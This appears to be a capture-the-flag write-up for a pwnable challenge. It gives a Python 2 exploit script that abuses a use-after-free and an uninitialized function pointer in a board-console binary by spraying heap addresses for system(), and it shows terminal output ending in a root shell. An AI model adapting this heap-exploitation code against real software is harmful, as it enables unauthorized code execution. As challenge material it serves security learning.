Category : Pwnables
Summary : use-after-free, using uninitialized function pointer
Exploit
```python
#!/usr/bin/python
# Python 2 script: str and struct.pack() output are concatenated directly.
import sys
from struct import pack

write = lambda author, title, content: sys.stdout.write("1\n"+author+"\n"+title+"\n"+content+"\n")
read = lambda idx: sys.stdout.write("2\n"+str(idx)+"\n")
delete = lambda: sys.stdout.write("1\n")
modify = lambda author, title: sys.stdout.write("2\n"+author+"\n"+title+"\n")
reply = lambda content: sys.stdout.write("3\n"+content+"\n")
back = lambda: sys.stdout.write("4\n")
p = lambda x: pack("<L", x)

system_plt = 0x08048630
default_handler = 0x080487c4

################ WRITE CONTENT ##################
for i in range(3):
    write("pwn3r", "hello", p(default_handler)*0x300 + p(system_plt)*0x100)
#################################################

################ DELETE SECOND ##################
read(2)
for i in range(0x80):
    reply("my reply")
delete()
back()
#################################################

################ REALLOCATE #####################
for i in range(2):
    write("pwn3r", "hello again", "B"*4)
read(4)
for i in range(0xa0):
    reply("sh")
#################################################

################ TRIGGER VULN ###################
modify("pwn3r", "good bye")
delete()
#################################################
```
```
root@ubuntu:~/vuln/400# (./exploit.py ;cat) | ./level4
_______________________________
/==============================/
| Onetime Board Console |
/------------------------------/
| | WELCOME | |
|__________|_________|_________|
| W a i t |
++++++++++++++++++++++++++++++++
1. Write 2. Read 3. Exit
=> Author : Title : Content :
1. Write 2. Read 3. Exit
=> Author : Title : Content :
1. Write...............................................................
...............................................................
1. delete 2. modify 3. reply 4. back
=> Author : Title :
1. delete 2. modify 3. reply 4. back
=> id
uid=0(root) gid=0(root) 그룹들=0(root)
```